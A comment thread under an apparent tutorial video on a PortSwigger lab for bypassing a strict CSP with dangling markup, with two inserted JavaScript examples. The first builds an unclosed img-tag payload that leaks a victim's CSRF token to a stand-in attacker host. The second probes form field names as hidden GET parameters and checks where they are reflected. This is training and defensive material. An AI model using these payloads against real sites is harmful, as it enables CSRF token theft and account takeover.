Reflected XSS Protected by Very Strict CSP with Dangling Markup Attack

Views: 4,676

z3nsh3ll

1 day ago

Comments: 40
@minionikgaming-clashroyale6754 · 1 year ago
I don't understand why only 480 people have watched this masterpiece explanation 🎉🎉🎉🎉 Loved it sir. You explained my favourite bug type so efficiently.
@mostafamohammed5080 · 4 months ago
I was disappointed when I did not find your explanation in the PortSwigger lab and was ready to skip it altogether because I did not understand a thing, but fortunately I tried to search a bit and was thrilled to see your amazing videos 🥰😍 Thank you very much for your kindness and amazing explanation👍
@bayaspirinha · 1 year ago
This lab cannot be solved in this way anymore; they patched it by using the URL of the lab as a replacement for Burp. Very sad. Thanks for the video anyway, I learned a lot :)
@jesusgavancho9170 · 1 year ago
It can be solved, try to escape
@Hugo-my3ek · 11 months ago
@@jesusgavancho9170 How?
@mikeyfinn2 · 10 months ago
@@jesusgavancho9170 It appears the robot user won't click on the bait if the href URL targets the exploit server; did you get around that?
@austynstephens9263 · 10 months ago
Thanks, I was losing my mind until I found this comment lol
@fm0x1 · 1 year ago
Whoa! The explanation was amazing, thank you for sharing your knowledge bro.
@milapmerja5033 · 1 year ago
Great explanation brother. Helpful for a beginner to understand easily.
@1n3c · 11 months ago
Very good job. Definitely worth watching.
@shooterdd632 · 1 year ago
Stealing the CSRF token didn't work? Something was changed in this lab
@nishantdalvi9470 · 1 year ago
Yes, I am able to grab my own (wiener) CSRF token from the exploit server's access logs, but I can't see the CSRF token of the victim when I deliver the exploit to the victim. The lab is not doing the simulation thing any more
@jesusgavancho9170 · 1 year ago
The victim is using Google Chrome, so dangling markup injection won't work; in Firefox it works. I did it another way, escaping @@nishantdalvi9470
@vlads4779 · 11 months ago
@@nishantdalvi9470 same issue here
@hichamzouhri395 · 10 months ago
I have the same problem 😢
@mikeyfinn2 · 10 months ago
@@hichamzouhri395 Yep, I did a one-click version with JS that works great on my own user, but as near as I can tell the robot user never clicks on the "Click". I suspect that anything that isn't an official Collaborator URL is getting blocked once the user has the initial page. OK, fine, they're a business.
@MrCredo-tz5rh · 1 year ago
Thank you for your explanation!!!
@lukeastorw · 1 year ago
8:20 can it be used for an open redirect vuln..?
@sr.holmes5552 · 10 months ago
As always, your videos are a gem
@nazuko2721 · 4 months ago
There's another lab related to CSP that has been added in PortSwigger; please solve that lab too. At the time of your recording that lab hadn't been added, but now it has, please solve it
@mostafa12979 · 11 months ago
Thank you so much ❤
@youssef-kz3yn · 6 months ago
Please sir, can you check if this exploit is still working on the latest Chrome version?? Because it doesn't seem to work on Chrome, but the same exploit works for me on Firefox
@ashrafbrown6695 · 5 months ago
same here
@gabutplay7961 · 1 month ago
same here, were you able to solve it?
@amaljose6374 · 8 months ago
By doing it your way without Burp Collaborator, when clicking the "click me" link after the exploit server it says "invalid host". And when I try to do it by the solution, after delivering the exploit via the exploit server and Collaborator, I didn't get any DNS or HTTP interactions in the Collaborator menu. Does anybody know any solutions :) Please ignore my language mistakes
@youssef-kz3yn · 6 months ago
The exploit is not working on Chrome anymore, which is weird because the victim is using Chrome. I tried on Firefox and the exploit works for me, but on the victim it is not working
@amaljose6374 · 6 months ago
@@youssef-kz3yn Very kind of you to consider my comment ❤️
@youssef-kz3yn · 6 months ago
@@amaljose6374 You are welcome my friend, if you find any solution please bring it back here
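Several threads above (shooterdd632/nishantdalvi9470/jesusgavancho9170, and youssef-kz3yn/amaljose6374) report the same thing: the dangling-markup payload leaks the token in Firefox but produces nothing when the Chrome-based victim loads it. The script below is an added example, not code from the video or the PortSwigger lab, that walks through why. It builds a constructed victim page, injects an `<img src='…` with no closing quote, shows how the tokenizer folds the following markup (CSRF token included) into the image URL, and then applies the Chromium-style check that refuses to fetch a URL containing both a `<` and a newline. The attacker host, the page layout and the token value are assumptions; the exact browser heuristic should be verified against the version you target.

```javascript
// Added example (not code from the video or the PortSwigger lab): simulate a
// dangling-markup injection against a constructed page, then apply the
// Chromium-style check that decides whether the browser sends the request.

// Constructed victim page. INJECT marks where a reflected parameter lands in
// the HTML; a CSRF token sits in a form further down; the single quote in the
// logout link is what eventually closes the dangling attribute.
const PAGE_TEMPLATE = [
  '<html><body>',
  '<p>Results for: INJECT</p>',
  '<form method="POST" action="/my-account/change-email">',
  '  <input type="hidden" name="csrf" value="k9Z2xQ7Lq0vJmT3p">',
  '  <input type="email" name="email">',
  '</form>',
  "<a href='/logout'>Log out</a>",
  '</body></html>',
].join('\n');

// The payload opens an <img> whose src attribute is never closed. The attacker
// host is an assumption for the example.
const PAYLOAD = "<img src='https://attacker.example/log?x=";

function renderPage(template, reflected) {
  return template.replace('INJECT', reflected);
}

// How the HTML tokenizer reads an unclosed single-quoted attribute: the value
// runs from the opening quote to the next single quote in the document, so the
// markup in between (token included) becomes part of the image URL.
// Returns null when no closing quote exists: at EOF inside an attribute the
// tag is dropped and no request is made at all.
function extractDanglingSrc(html, payload) {
  const start = html.indexOf(payload);
  if (start === -1) return null;
  const valueStart = start + payload.indexOf("'") + 1;
  const valueEnd = html.indexOf("'", valueStart);
  return valueEnd === -1 ? null : html.slice(valueStart, valueEnd);
}

// Chromium's dangling-markup mitigation as I understand it: a resource URL
// that contains both a '<' and a newline is assumed to have swallowed markup
// and the fetch is blocked. Verify against the browser version you target.
function isBlockedAsDanglingMarkup(rawUrl) {
  return rawUrl.includes('<') && /[\n\r]/.test(rawUrl);
}

// The URL parser strips tabs and newlines before the request goes out; this
// is the query string the attacker's server actually logs.
function toWireUrl(rawUrl) {
  return rawUrl.replace(/[\t\n\r]/g, '');
}

// Pull the token out of the leaked query string, as the attacker's log
// handler would.
function recoverToken(wireUrl) {
  const m = /name="csrf" value="([^"]*)"/.exec(wireUrl);
  return m ? m[1] : null;
}

// Run the whole chain for a browser that applies the check ('chrome') or one
// that the comments report does not ('firefox').
function simulate(browser) {
  const html = renderPage(PAGE_TEMPLATE, PAYLOAD);
  const rawUrl = extractDanglingSrc(html, PAYLOAD);
  if (rawUrl === null) {
    return { sent: false, reason: 'no closing quote after injection', token: null };
  }
  if (browser === 'chrome' && isBlockedAsDanglingMarkup(rawUrl)) {
    return { sent: false, reason: 'blocked as dangling markup', token: null };
  }
  const url = toWireUrl(rawUrl);
  return { sent: true, url, token: recoverToken(url) };
}

console.log(simulate('chrome'));
console.log(simulate('firefox'));
```

Nothing in this chain executes script, which is why a CSP that only locks down `script-src` does not stop it: the browser simply requests an image. What does stop it is restricting `img-src` (and the other resource-loading directives) to known hosts, or a browser-side check like the one modelled in `isBlockedAsDanglingMarkup`. The null return from `extractDanglingSrc` is also worth noting when a payload "does nothing" in any browser: if no matching quote follows the injection point, the tag is never emitted.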
@0wners5651 · 6 months ago
thank you sir
@javeleyjaveley · 1 year ago
How do you know GET has the hidden parameter email?
@z3nsh3ll · 1 year ago
It's a good question. I don't see a reason why we are supposed to know that. My guess is that PortSwigger is encouraging trying out some logical GET parameters even if a site doesn't appear to be using them.
@mikeyfinn2 · 10 months ago
The URL has the id parameter, so that's a clue it might take others too; it's a hard problem to strike a balance between "expert" level labs vs. focusing on the core issue without weighing down the exercise with material covered in previous labs
@javeleyjaveley · 10 months ago
I want to discuss the issue of hidden parameters, which is often mentioned in many bug bounty articles. However, I have not encountered this in practice, except in target practice. A normal website usually has hundreds of API interfaces and parameters. Even if we collect all the parameters and conduct fuzz testing on all interfaces, it would still be a significant workload. I'm not sure how much time others spend on exploring a single website when they are bounty hunting, but my patience only allows me to spend 2 to 3 hours on a website. This includes directory exploration, understanding the site's logic and functionality, as well as fuzzing and port scanning. @@mikeyfinn2
@garthoid · 5 months ago
In general, any form input elements with a name should be tested as URL parameters.
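The thread above asks how anyone would know that `email` is accepted as a GET parameter, and garthoid's answer is the general rule: every named form control is a candidate. The script below is an added example, not code from the video or the lab, that turns that rule into a repeatable check: it harvests `name=` values from a page's forms (POST forms included, since a handler may read the query string too), probes each as a GET parameter with a distinct marker, and classifies where the marker is reflected, which is what decides whether a quote-breaking payload such as the dangling-markup one is the next thing to try. The page, the base URL and the target's behaviour are constructed stand-ins; swap `fakeTarget` for a real HTTP client to use it against an authorised target.

```javascript
// Added example (not code from the video or the lab): harvest candidate
// parameter names from a page's forms, probe each as a GET parameter, and
// classify any reflection. Page content, URL and target behaviour are
// constructed for the example.

// Constructed page: a POST form and a GET form with several named fields.
const SAMPLE_HTML = `
<form method="POST" action="/my-account/change-email">
  <input type="hidden" name="csrf" value="abc123">
  <input type="email" name="email">
  <button name="submit">Update email</button>
</form>
<form method="GET" action="/search">
  <input type="text" name="q">
</form>`;

// Every name= on a form control is a candidate, whatever method the form
// uses: the server-side handler may read it from the query string too.
function harvestParamNames(html) {
  const names = new Set();
  const re = /<(?:input|select|textarea|button)\b[^>]*\bname\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) names.add(m[1]);
  return [...names];
}

// One probe URL per candidate, each with a distinct marker so a reflection can
// be tied back to the parameter that caused it.
function buildProbes(baseUrl, names, marker = 'zx') {
  return names.map((name, i) => {
    const url = new URL(baseUrl);
    const value = `${marker}${i}${marker}`;
    url.searchParams.set(name, value);
    return { name, value, url: url.toString() };
  });
}

// Where did the marker come back? Inside a tag (attribute context) calls for a
// quote-breaking payload such as the dangling-markup one; in text, a plain tag
// injection is the first thing to try.
function classifyReflection(body, value) {
  const idx = body.indexOf(value);
  if (idx === -1) return 'none';
  const before = body.slice(0, idx);
  return before.lastIndexOf('<') > before.lastIndexOf('>') ? 'attribute' : 'text';
}

// Constructed stand-in for the target: it reads only `email` from the query
// string and echoes it unescaped into an attribute value, ignoring the rest.
function fakeTarget(urlString) {
  const email = new URL(urlString).searchParams.get('email') || '';
  return `<input type="email" name="email" value="${email}">`;
}

// Run the probes through a fetcher (the stand-in by default; a real HTTP
// client for a live target) and return one finding per candidate name.
function probeHiddenParams(baseUrl, fetcher = fakeTarget) {
  const names = harvestParamNames(SAMPLE_HTML);
  return buildProbes(baseUrl, names).map((p) => ({
    name: p.name,
    context: classifyReflection(fetcher(p.url), p.value),
  }));
}

console.log(probeHiddenParams('https://target.example/my-account?id=wiener'));
```

The marker-per-parameter detail matters more than it looks: sending all candidates in one request hides which name the server actually read, and a reflection in attribute context versus text context changes the payload shape entirely.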
@camilohurtado4814 · 5 months ago
Has anybody been able to solve this lab recently?
@javeleyjaveley · 1 year ago
I like your video
@_96blackjack50 · 2 months ago
not working..
@Приветводка-й4м · 3 months ago
bro, idk but I think you exposed your public IP in the video